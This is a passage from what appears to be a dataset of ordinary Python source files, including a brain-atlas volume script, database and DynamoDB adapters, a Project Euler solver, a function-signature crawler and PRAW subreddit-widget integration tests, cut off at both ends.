KeyError:\n print(\n f\"Value: {atlas_value} is not in the atlas structure\"\n f\" reference file. Not calculating the volume\"\n )\n filename = destination_directory / (name + extension)\n df.to_csv(filename, index=False)\n\n\ndef get_total_volume_regions(\n unique_vals_left,\n unique_vals_right,\n counts_left,\n counts_right,\n):\n zero_index_left = np.where(unique_vals_left == 0)[0][0]\n counts_left = list(counts_left)\n counts_left.pop(zero_index_left)\n\n zero_index_right = np.where(unique_vals_right == 0)[0][0]\n counts_right = list(counts_right)\n counts_right.pop(zero_index_right)\n\n return sum(counts_left + counts_right)\n\n\ndef add_structure_volume_to_df(\n df,\n atlas_value,\n atlas_structures,\n unique_vals_left,\n unique_vals_right,\n counts_left,\n counts_right,\n voxel_volume,\n total_volume_voxels=None,\n):\n name = atlas_structures[atlas_value][\"name\"]\n\n left_volume, left_percentage = get_volume_in_hemisphere(\n atlas_value,\n unique_vals_left,\n counts_left,\n total_volume_voxels,\n voxel_volume,\n )\n right_volume, right_percentage = get_volume_in_hemisphere(\n atlas_value,\n unique_vals_right,\n counts_right,\n total_volume_voxels,\n voxel_volume,\n )\n if total_volume_voxels is not None:\n total_percentage = left_percentage + right_percentage\n else:\n total_percentage = 0\n\n df = df.append(\n {\n \"structure_name\": name,\n \"left_volume_mm3\": left_volume,\n \"left_percentage_of_total\": left_percentage,\n \"right_volume_mm3\": right_volume,\n \"right_percentage_of_total\": right_percentage,\n \"total_volume_mm3\": left_volume + right_volume,\n \"percentage_of_total\": total_percentage,\n },\n ignore_index=True,\n )\n return df\n\n\ndef get_volume_in_hemisphere(\n atlas_value, unique_vals, counts, total_volume_voxels, voxel_volume\n):\n try:\n index = np.where(unique_vals == atlas_value)[0][0]\n volume = counts[index] * voxel_volume\n if total_volume_voxels is not None:\n percentage = 100 * (counts[index] / total_volume_voxels)\n else:\n percentage = 0\n except IndexError:\n volume = 0\n percentage = 0\n\n return volume, percentage\n"} {"ext": "py", "sha": "1a2ffb7fc92162f5f54956dbe55a174b83ff8a33", "content": "import psycopg2\n\nclass Conn:\n def __init__(self, connstr):\n self.conn = psycopg2.connect(connstr)\n self.setversion()\n self.nexttmp = 0\n \n def setversion(self):\n cur = self.conn.cursor()\n cur.execute(\"select version()\")\n verstr = cur.fetchone()\n if \"Greenplum Database 4\" in verstr[0]:\n self.ver = 4\n elif \"Greenplum Database 5\" in verstr[0]:\n self.ver = 5\n else:\n raise RuntimeError('Unknown Deepgreen Version')\n \n self.typemap = {}\n cur.execute(\"select oid, typname from pg_type\")\n rows = cur.fetchall()\n for row in rows:\n self.typemap[row[0]] = row[1]\n\n cur.close()\n self.conn.commit()\n\n def close(self):\n self.conn.close()\n\n def next_tmpname(self):\n self.nexttmp += 1\n return \"tmp_{0}\".format(self.nexttmp)\n\n def execute(self, sql):\n cur = self.conn.cursor()\n cur.execute(sql) \n rows = cur.fetchall()\n cur.close()\n self.conn.commit()\n return rows\n\n def cursor(self, sql):\n cur = self.conn.cursor()\n cur.execute(sql) \n return cur\n\n\nif __name__ == '__main__':\n conn = Conn(\"host=localhost user=ftian dbname=ftian\")\n print(\"Connected to deepgreen database, version is \", conn.ver)\n\n"} {"ext": "py", "sha": "1a2ffbd7b7c07c33f20999ed51f3d64383f0f858", "content": "import _plotly_utils.basevalidators\n\n\nclass TextsrcValidator(_plotly_utils.basevalidators.SrcValidator):\n def __init__(self, plotly_name=\"textsrc\", parent_name=\"scattermapbox\", **kwargs):\n super(TextsrcValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n edit_type=kwargs.pop(\"edit_type\", \"none\"),\n **kwargs\n )\n"} {"ext": "py", "sha": "1a2ffbd9964cf66f2b41f80870cc2a60b4cddbce", "content": "\"\"\"\nThe most naive way of computing n15 requires fourteen multiplications:\n\nn × n × ... × n = n15\n\nBut using a \"binary\" method you can compute it in six multiplications:\n\nn × n = n2\nn2 × n2 = n4\nn4 × n4 = n8\nn8 × n4 = n12\nn12 × n2 = n14\nn14 × n = n15\n\nHowever it is yet possible to compute it in only five multiplications:\n\nn × n = n2\nn2 × n = n3\nn3 × n3 = n6\nn6 × n6 = n12\nn12 × n3 = n15\n\nWe shall define m(k) to be the minimum number of multiplications to compute nk; for example m(15) = 5.\n\nFor 1 ≤ k ≤ 200, find ∑ m(k).\n\nans: 1582\n\"\"\"\n\nn = 200\n\nclass Done(Exception):\n\tpass\n\ndef combine(exponents, max_depth, steps):\n\tif exponents[-1] > n or len(exponents) - 1 > max_depth:\n\t\treturn\n\t\n\ttry:\n\t\tsteps[exponents[-1]] = min(steps[exponents[-1]], len(exponents)-1)\n\texcept KeyError:\n\t\tsteps[exponents[-1]] = len(exponents)-1\n\t\tif len(steps) == n:\n\t\t\traise Done\n\t\n\tfor i in range(len(exponents)):\n\t\texp = exponents[i]\n\t\texponents.append(exp + exponents[-1])\n\t\tcombine(exponents, max_depth, steps)\n\t\texponents.pop()\n\nsteps = {1:0}\ntry:\n\tfor depth in range(n): # need to iterate depths in order to stop early in combine()\n\t\tcombine([1], depth, steps)\n\t\t#print(f\"{depth} {len(steps)}\")\nexcept Done:\n\tpass\n\n#print(steps)\nprint(sum(( steps[k] for k in steps )))"} {"ext": "py", "sha": "1a2ffc4dfbbfcd4c40a6f056c0aaac1ff112c9a9", "content": "from typing import Optional\nimport logging\n\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom kermes_infra.models import User\n\n\nclass UserAdapter:\n def __init__(self, endpoint_url: str, table_name: str, logger: logging.Logger) -> None:\n self.dynamodb = boto3.resource(\"dynamodb\", endpoint_url=endpoint_url)\n self.table = self.dynamodb.Table(table_name)\n self.logger = logger\n\n def get(self, user_id: str) -> Optional[User]:\n try:\n item = self.table.get_item(Key={\"user_id\": user_id})\n\n return User.from_dynamo(item[\"Item\"])\n except ClientError:\n self.logger.error(f\"error while getting record from Dynamo: user_id {user_id}\", exc_info=True)\n return None\n\n def put(self, user: User) -> bool:\n try:\n self.table.put_item(Item=user.to_dynamo())\n return True\n except ClientError:\n self.logger.error(\n f\"error while writing record to Dynamo: user_id {user.user_id}\",\n exc_info=True,\n )\n return False\n"} {"ext": "py", "sha": "1a2ffd14bee0c539d2c149abaa4f7937e9156b91", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.paging import Paged\n\n\nclass StorageAccountPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`StorageAccount ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[StorageAccount]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(StorageAccountPaged, self).__init__(*args, **kwargs)\n"} {"ext": "py", "sha": "1a2ffd6458b72da5981d8465dd861600cea84490", "content": "##\n## File: utils.py\n##\n## Author: Schuyler Martin \n##\n## Description: Python file that contains basic utility functions\n##\n\nfrom utils.macros import *\nimport sys\n\n#### GLOBALS ####\n\n#### FUNCTIONS ####\n\ndef printd(msg):\n '''\n Prints debugging messages if debugging is enabled\n :param: msg Message to print\n '''\n if (DEBUG_MACRO):\n print(\"DEBUG: \" + msg)\n\ndef read_file(fd):\n '''\n Reads in the file, line by line\n :param: fd Name of the file\n :return: Contents of the file, as an array of line strings\n '''\n data = []\n for line in open(fd):\n data += [line]\n return data\n\ndef write_file(data, fd):\n '''\n Writes to a file, line by line\n :param: data Lines of the file to write\n :param: fd Name of the file to write\n '''\n fptr = open(fd, 'w')\n for line in data:\n fptr.write(line)\n fptr.close()\n \n"} {"ext": "py", "sha": "1a2ffdce407417f63fd3d58bf33c86816e6173bc", "content": "\"\"\"\nExample script of constant use in Python. Constants should always be\n capitalized to signify their significance. Because everything is an object\n in Python and nothing can really be set as private, using visual\n identifiers, such as capitalizing all letters in a name and starting function\n names with an underscore, are important to for script readability.\n\nThis script uses two constants, URL and STATE, and then prints out a string\n using these constants for a state's download url (not a real url and doesn't\n actually download anything).\n\n\"\"\"\n\nURL = 'https://www.statedata.com/'\nSTATE = 'MD'\n\nprint 'Downloading data from {}{}'.format(URL, STATE)\n"} {"ext": "py", "sha": "1a2ffefd93504a899b3ed1bdacedc16dad3774b3", "content": "#!/home/wecode/Documents/Django_Projects/NeighborhoodNews/virtual/bin/python\nfrom django.core import management\n\nif __name__ == \"__main__\":\n management.execute_from_command_line()\n"} {"ext": "py", "sha": "1a2fff6c7fe50c71c5d89283ce05e59433db0a38", "content": "import argparse\nimport sys\nimport time\nfrom typing import Optional, Union\n\nfrom moonstreamdb.db import yield_db_session_ctx\nfrom moonstreamdb.models import ESDEventSignature, ESDFunctionSignature\nfrom sqlalchemy.orm import Session\nimport requests\n\nCRAWL_URLS = {\n \"functions\": \"https://www.4byte.directory/api/v1/signatures/\",\n \"events\": \"https://www.4byte.directory/api/v1/event-signatures/\",\n}\n\nDB_MODELS = {\n \"functions\": ESDFunctionSignature,\n \"events\": ESDEventSignature,\n}\n\n\ndef crawl_step(\n db_session: Session,\n crawl_url: str,\n db_model: Union[ESDEventSignature, ESDFunctionSignature],\n) -> Optional[str]:\n attempt = 0\n current_interval = 2\n success = False\n\n response: Optional[requests.Response] = None\n while (not success) and attempt < 3:\n attempt += 1\n try:\n response = requests.get(crawl_url)\n response.raise_for_status()\n success = True\n except:\n current_interval *= 2\n time.sleep(current_interval)\n\n if response is None:\n print(f\"Could not process URL: {crawl_url}\", file=sys.stderr)\n return None\n\n page = response.json()\n results = page.get(\"results\", [])\n\n rows = [\n db_model(\n id=row.get(\"id\"),\n text_signature=row.get(\"text_signature\"),\n hex_signature=row.get(\"hex_signature\"),\n created_at=row.get(\"created_at\"),\n )\n for row in results\n ]\n db_session.bulk_save_objects(rows)\n db_session.commit()\n\n return page.get(\"next\")\n\n\ndef crawl(crawl_type: str, interval: float) -> None:\n crawl_url: Optional[str] = CRAWL_URLS[crawl_type]\n db_model = DB_MODELS[crawl_type]\n with yield_db_session_ctx() as db_session:\n while crawl_url is not None:\n print(f\"Crawling: {crawl_url}\")\n crawl_url = crawl_step(db_session, crawl_url, db_model)\n time.sleep(interval)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Crawls function and event signatures from the Ethereum Signature Database (https://www.4byte.directory/)\"\n )\n parser.add_argument(\n \"crawl_type\",\n choices=CRAWL_URLS,\n help=\"Specifies whether to crawl function signatures or event signatures\",\n )\n parser.add_argument(\n \"--interval\",\n type=float,\n default=0.1,\n help=\"Number of seconds to wait between requests to the Ethereum Signature Database API\",\n )\n args = parser.parse_args()\n\n crawl(args.crawl_type, args.interval)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2fffabca09fbc25104a88cc8bdbb8d1b43aded", "content": "import mock\nimport pytest\nfrom os.path import abspath, dirname, join\nimport sys\n\nfrom praw.models import (Button, ButtonWidget, Calendar, CommunityList,\n CustomWidget, Menu, MenuLink, IDCard, Image,\n ImageData, ImageWidget, ModeratorsWidget,\n PostFlairWidget, Redditor, RulesWidget, Submenu,\n Subreddit, TextArea, Widget)\nfrom ... import IntegrationTest\n\nif sys.version_info.major > 2:\n basestring = str # pylint: disable=invalid-name\n\n\nclass TestButtonWidget(IntegrationTest):\n @staticmethod\n def image_path(name):\n test_dir = abspath(dirname(sys.modules[__name__].__file__))\n return join(test_dir, '..', '..', 'files', name)\n\n def test_button_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n button_widget = None\n for widget in widgets.sidebar:\n if isinstance(widget, ButtonWidget):\n button_widget = widget\n break\n assert isinstance(button_widget, ButtonWidget)\n assert len(button_widget) >= 1\n assert all(isinstance(button, Button) for button in\n button_widget.buttons)\n assert button_widget == button_widget\n assert button_widget.id == button_widget\n assert button_widget in widgets.sidebar\n\n assert button_widget[0].text\n assert button_widget.shortName\n assert hasattr(button_widget, 'description')\n\n assert subreddit == button_widget.subreddit\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestButtonWidget.test_create_and_update_and_delete'):\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n my_image = widgets.mod.upload_image(self.image_path('test.png'))\n buttons = [\n {\n 'kind': 'text',\n 'text': 'View source',\n 'url': 'https://github.com/praw-dev/praw',\n 'color': '#FF0000',\n 'textColor': '#00FF00',\n 'fillColor': '#0000FF',\n 'hoverState': {\n 'kind': 'text',\n 'text': 'VIEW SOURCE!',\n 'color': '#FFFFFF',\n 'textColor': '#000000',\n 'fillColor': '#0000FF'\n }\n },\n {\n 'kind': 'image',\n 'text': 'View documentation',\n 'linkUrl': 'https://praw.readthedocs.io',\n 'url': my_image,\n 'height': 200,\n 'width': 200,\n 'hoverState': {\n 'kind': 'image',\n 'url': my_image,\n 'height': 200,\n 'width': 200\n }\n },\n {\n 'kind': 'text',\n 'text': '/r/redditdev',\n 'url': 'https://reddit.com/r/redditdev',\n 'color': '#000000',\n 'textColor': '#FF00FF',\n 'fillColor': '#005500'\n }\n ]\n widget = widgets.mod.add_button_widget(\n 'Things to click', 'Click some of these *cool* links!',\n buttons, styles)\n\n assert isinstance(widget, ButtonWidget)\n assert len(widget) == 3\n assert all(isinstance(item, Button) for item in widget)\n assert widget.shortName == 'Things to click'\n assert widget.description == 'Click some of these *cool* links!'\n assert widget.styles == styles\n\n assert widget[0].text == 'View source'\n assert widget[0].url == 'https://github.com/praw-dev/praw'\n assert widget[2].text == '/r/redditdev'\n assert widget[2].url == 'https://reddit.com/r/redditdev'\n\n assert widget[1].text == 'View documentation'\n assert widget[1].linkUrl == 'https://praw.readthedocs.io'\n assert widget[1].hoverState['kind'] == 'image'\n assert widget[1].hoverState['height'] == 200\n\n widgets.refresh() # the links are initially invalid\n for new_widget in widgets.sidebar:\n if new_widget == widget:\n widget = new_widget\n break\n\n widget = widget.mod.update(shortName='New short name')\n\n assert isinstance(widget, ButtonWidget)\n assert len(widget) == 3\n assert all(isinstance(item, Button) for item in widget)\n assert widget.shortName == 'New short name'\n assert widget.description == 'Click some of these *cool* links!'\n assert widget.styles == styles\n\n assert widget[0].text == 'View source'\n assert widget[0].url == 'https://github.com/praw-dev/praw'\n assert widget[2].text == '/r/redditdev'\n assert widget[2].url == 'https://reddit.com/r/redditdev'\n\n assert widget[1].text == 'View documentation'\n assert widget[1].linkUrl == 'https://praw.readthedocs.io'\n assert widget[1].hoverState['kind'] == 'image'\n assert widget[1].hoverState['height'] == 200\n\n buttons.reverse()\n widget = widget.mod.update(buttons=buttons)\n\n assert isinstance(widget, ButtonWidget)\n assert len(widget) == 3\n assert all(isinstance(item, Button) for item in widget)\n assert widget.shortName == 'New short name'\n assert widget.description == 'Click some of these *cool* links!'\n assert widget.styles == styles\n\n assert widget[0].text == '/r/redditdev'\n assert widget[0].url == 'https://reddit.com/r/redditdev'\n assert widget[2].text == 'View source'\n assert widget[2].url == 'https://github.com/praw-dev/praw'\n\n assert widget[1].text == 'View documentation'\n assert widget[1].linkUrl == 'https://praw.readthedocs.io'\n assert widget[1].hoverState['kind'] == 'image'\n assert widget[1].hoverState['height'] == 200\n\n widget.mod.delete()\n\n\nclass TestCalendar(IntegrationTest):\n\n def test_calendar(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n calendar = None\n for widget in widgets.sidebar:\n if isinstance(widget, Calendar):\n calendar = widget\n break\n assert isinstance(calendar, Calendar)\n assert calendar == calendar\n assert calendar.id == calendar\n assert calendar in widgets.sidebar\n\n assert isinstance(calendar.configuration, dict)\n assert hasattr(calendar, 'requiresSync')\n\n assert subreddit == calendar.subreddit\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestCalendar.test_create_and_update_and_delete'):\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n config = {'numEvents': 10,\n 'showDate': True,\n 'showDescription': False,\n 'showLocation': False,\n 'showTime': True,\n 'showTitle': True}\n cal_id = 'ccahu0rstno2jrvioq4ccffn78@group.calendar.google.com'\n widget = widgets.mod.add_calendar('Upcoming Events', cal_id, True,\n config, styles)\n\n assert isinstance(widget, Calendar)\n assert widget.shortName == 'Upcoming Events'\n assert widget.googleCalendarId == 'ccahu0rstno2jrvioq4ccffn78@' \\\n 'group.calendar.google.com'\n assert widget.configuration == config\n assert widget.styles == styles\n\n widget = widget.mod.update(shortName='Past Events :(')\n\n assert isinstance(widget, Calendar)\n assert widget.shortName == 'Past Events :('\n assert widget.googleCalendarId == 'ccahu0rstno2jrvioq4ccffn78@' \\\n 'group.calendar.google.com'\n assert widget.configuration == config\n assert widget.styles == styles\n\n widget.mod.delete()\n\n\nclass TestCommunityList(IntegrationTest):\n\n def test_community_list(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n comm_list = None\n for widget in widgets.sidebar:\n if isinstance(widget, CommunityList):\n comm_list = widget\n break\n assert isinstance(comm_list, CommunityList)\n assert len(comm_list) >= 1\n assert all(isinstance(subreddit, Subreddit) for subreddit in\n comm_list)\n assert comm_list == comm_list\n assert comm_list.id == comm_list\n assert comm_list in widgets.sidebar\n\n assert comm_list.shortName\n assert comm_list[0] in comm_list\n\n assert subreddit == comm_list.subreddit\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestCommunityList.test_create_and_update_and_delete'):\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n subreddits = ['learnpython', self.reddit.subreddit('redditdev')]\n widget = widgets.mod.add_community_list('My fav subs', subreddits,\n styles)\n\n assert isinstance(widget, CommunityList)\n assert widget.shortName == 'My fav subs'\n assert widget.styles == styles\n assert self.reddit.subreddit('learnpython') in widget\n assert 'redditdev' in widget\n\n widget = widget.mod.update(shortName='My least fav subs :(',\n data=['redesign'])\n\n assert isinstance(widget, CommunityList)\n assert widget.shortName == 'My least fav subs :('\n assert widget.styles == styles\n assert self.reddit.subreddit('redesign') in widget\n\n widget.mod.delete()\n\n\nclass TestCustomWidget(IntegrationTest):\n @staticmethod\n def image_path(name):\n test_dir = abspath(dirname(sys.modules[__name__].__file__))\n return join(test_dir, '..', '..', 'files', name)\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestCustomWidget.test_create_and_update_and_delete'):\n image_dicts = [{'width': 0,\n 'height': 0,\n 'name': 'a',\n 'url': widgets.mod.upload_image(self.image_path(\n 'test.png'))}]\n\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n widget = widgets.mod.add_custom_widget('My widget',\n '# Hello world!', '/**/',\n 200, image_dicts, styles)\n\n assert isinstance(widget, CustomWidget)\n assert widget.shortName == 'My widget'\n assert widget.text == '# Hello world!'\n assert widget.css == '/**/'\n assert widget.height == 200\n assert widget.styles == styles\n assert len(widget.imageData) == 1\n assert all(isinstance(img, ImageData) for img in widget.imageData)\n\n # initially, image URLs are incorrect, so we much refresh to get\n # the proper ones.\n widgets.refresh()\n refreshed = widgets.sidebar[-1]\n assert refreshed == widget\n widget = refreshed\n\n new_css = 'h1,h2,h3,h4,h5,h6 {color: #00ff00;}'\n widget = widget.mod.update(css=new_css)\n\n assert isinstance(widget, CustomWidget)\n assert widget.shortName == 'My widget'\n assert widget.text == '# Hello world!'\n assert widget.css == new_css\n assert widget.height == 200\n assert widget.styles == styles\n assert len(widget.imageData) == 1\n assert all(isinstance(img, ImageData) for img in widget.imageData)\n\n widget.mod.delete()\n\n def test_custom_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n custom = None\n for widget in widgets.sidebar:\n if isinstance(widget, CustomWidget):\n custom = widget\n break\n assert isinstance(custom, CustomWidget)\n assert len(custom.imageData) > 0\n assert all(isinstance(img_data, ImageData) for img_data in\n custom.imageData)\n assert custom == custom\n assert custom.id == custom\n assert custom in widgets.sidebar\n\n assert 500 >= custom.height >= 50\n assert custom.text\n assert custom.css\n assert custom.shortName\n\n assert subreddit == custom.subreddit\n\n\nclass TestIDCard(IntegrationTest):\n\n def test_id_card(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n card = widgets.id_card\n assert isinstance(card, IDCard)\n assert card == card\n assert card.id == card\n\n assert card.shortName\n assert card.currentlyViewingText\n assert card.subscribersText\n\n assert subreddit == card.subreddit\n\n\nclass TestImageWidget(IntegrationTest):\n @staticmethod\n def image_path(name):\n test_dir = abspath(dirname(sys.modules[__name__].__file__))\n return join(test_dir, '..', '..', 'files', name)\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestImageWidget.test_create_and_update_and_delete'):\n image_paths = (self.image_path(name) for name in\n ('test.jpg', 'test.png'))\n image_dicts = [{'width': 0, 'height': 0, 'linkUrl': '',\n 'url': widgets.mod.upload_image(img_path)}\n for img_path in image_paths]\n\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n widget = widgets.mod.add_image_widget(short_name='My new pics!',\n data=image_dicts,\n styles=styles)\n\n assert isinstance(widget, ImageWidget)\n assert widget.shortName == 'My new pics!'\n assert widget.styles == styles\n assert len(widget) == 2\n assert all(isinstance(img, Image) for img in widget)\n\n widget = widget.mod.update(shortName='My old pics :(',\n data=image_dicts[:1])\n\n assert isinstance(widget, ImageWidget)\n assert widget.shortName == 'My old pics :('\n assert widget.styles == styles\n assert len(widget) == 1\n assert all(isinstance(img, Image) for img in widget)\n\n widget.mod.delete()\n\n def test_image_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n img_widget = None\n for widget in widgets.sidebar:\n if isinstance(widget, ImageWidget):\n img_widget = widget\n break\n assert isinstance(img_widget, ImageWidget)\n assert len(img_widget) >= 1\n assert all(isinstance(image, Image) for image in img_widget)\n assert img_widget == img_widget\n assert img_widget.id == img_widget\n assert img_widget in widgets.sidebar\n\n assert img_widget[0].linkUrl\n assert img_widget.shortName\n\n assert subreddit == img_widget.subreddit\n\n\nclass TestMenu(IntegrationTest):\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n menu_contents = [\n {'text': 'My homepage', 'url': 'https://example.com'},\n {'text': 'Python packages',\n 'children': [\n {'text': 'PRAW', 'url': 'https://praw.readthedocs.io/'},\n {'text': 'requests', 'url': 'http://python-requests.org'}\n ]},\n {'text': 'Reddit homepage', 'url': 'https://reddit.com'}\n ]\n\n with self.recorder.use_cassette(\n 'TestMenu.test_create_and_update_and_delete'):\n widget = widgets.mod.add_menu(menu_contents)\n\n assert isinstance(widget, Menu)\n assert len(widget) == 3\n assert all(isinstance(item, (Submenu, MenuLink))\n for item in widget)\n assert all(all(isinstance(item, MenuLink) for item in subm)\n for subm in widget if isinstance(subm, Submenu))\n\n assert widget[0].text == 'My homepage'\n assert widget[0].url == 'https://example.com'\n assert widget[2].text == 'Reddit homepage'\n assert widget[2].url == 'https://reddit.com'\n\n assert widget[1].text == 'Python packages'\n assert widget[1][0].text == 'PRAW'\n assert widget[1][0].url == 'https://praw.readthedocs.io/'\n assert widget[1][1].text == 'requests'\n assert widget[1][1].url == 'http://python-requests.org'\n\n menu_contents.reverse()\n widget = widget.mod.update(data=menu_contents)\n\n assert isinstance(widget, Menu)\n assert len(widget) == 3\n assert all(isinstance(item, (Submenu, MenuLink))\n for item in widget)\n assert all(all(isinstance(item, MenuLink) for item in subm)\n for subm in widget if isinstance(subm, Submenu))\n\n assert widget[0].text == 'Reddit homepage'\n assert widget[0].url == 'https://reddit.com'\n assert widget[2].text == 'My homepage'\n assert widget[2].url == 'https://example.com'\n\n assert widget[1].text == 'Python packages'\n assert widget[1][0].text == 'PRAW'\n assert widget[1][0].url == 'https://praw.readthedocs.io/'\n assert widget[1][1].text == 'requests'\n assert widget[1][1].url == 'http://python-requests.org'\n\n widget.mod.delete()\n\n def test_menu(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n menu = None\n for widget in widgets.topbar:\n if isinstance(widget, Menu):\n menu = widget\n break\n assert isinstance(menu, Menu)\n assert all(isinstance(item, (MenuLink, Submenu)) for item in menu)\n assert menu == menu\n assert menu.id == menu\n assert menu in widgets.topbar\n assert len(menu) >= 1\n assert menu[0].text\n\n assert subreddit == menu.subreddit\n\n submenu = None\n for child in menu:\n if isinstance(child, Submenu):\n submenu = child\n break\n assert isinstance(submenu, Submenu)\n assert len(submenu) >= 0\n assert all(isinstance(child, MenuLink) for child in submenu)\n assert submenu[0].text\n assert submenu[0].url\n\n\nclass TestModeratorsWidget(IntegrationTest):\n\n def test_moderators_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n mods = widgets.moderators_widget\n assert isinstance(mods, ModeratorsWidget)\n assert all(isinstance(mod, Redditor) for mod in mods)\n assert mods == mods\n assert mods.id == mods\n\n assert len(mods) >= 1\n assert isinstance(mods[0], Redditor)\n\n assert subreddit == mods.subreddit\n\n\nclass TestPostFlairWidget(IntegrationTest):\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestPostFlairWidget.test_create_and_update_and_delete'):\n flairs = [f['id'] for f in subreddit.flair.link_templates]\n\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n widget = widgets.mod.add_post_flair_widget('Some flairs', 'list',\n flairs, styles)\n\n assert isinstance(widget, PostFlairWidget)\n assert widget.shortName == 'Some flairs'\n assert widget.display == 'list'\n assert widget.order == flairs\n assert widget.styles == styles\n assert len(widget) == 2\n assert all(flair_id in widget.templates for flair_id in widget)\n\n widget = widget.mod.update(display='cloud')\n\n assert isinstance(widget, PostFlairWidget)\n assert widget.shortName == 'Some flairs'\n assert widget.display == 'cloud'\n assert widget.order == flairs\n assert widget.styles == styles\n assert len(widget) == 2\n assert all(flair_id in widget.templates for flair_id in widget)\n\n widget = widget.mod.update(order=widget.order[1:])\n\n assert isinstance(widget, PostFlairWidget)\n assert widget.shortName == 'Some flairs'\n assert widget.display == 'cloud'\n assert widget.order == flairs[1:]\n assert widget.styles == styles\n assert len(widget) == 1\n assert all(flair_id in widget.templates for flair_id in widget)\n\n widget.mod.delete()\n\n def test_post_flair_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n pf_widget = None\n for widget in widgets.sidebar:\n if isinstance(widget, PostFlairWidget):\n pf_widget = widget\n break\n assert isinstance(pf_widget, PostFlairWidget)\n assert len(pf_widget) >= 1\n assert all(flair_id in widget.templates for flair_id in widget)\n assert pf_widget == pf_widget\n assert pf_widget.id == pf_widget\n assert pf_widget in widgets.sidebar\n\n assert pf_widget.shortName\n assert all(flair in pf_widget for flair in pf_widget)\n\n assert subreddit == pf_widget.subreddit\n\n\nclass TestRulesWidget(IntegrationTest):\n\n def test_rules_widget(self):\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n rules = None\n for widget in widgets.sidebar:\n if isinstance(widget, RulesWidget):\n rules = widget\n break\n assert isinstance(rules, RulesWidget)\n assert rules == rules\n assert rules.id == rules\n\n assert rules.display\n\n assert len(rules) > 0\n assert subreddit == rules.subreddit\n\n\nclass TestSubredditWidgets(IntegrationTest):\n def test_bad_attribute(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n with pytest.raises(AttributeError):\n widgets.nonexistant_attribute\n\n def test_items(self):\n subreddit = 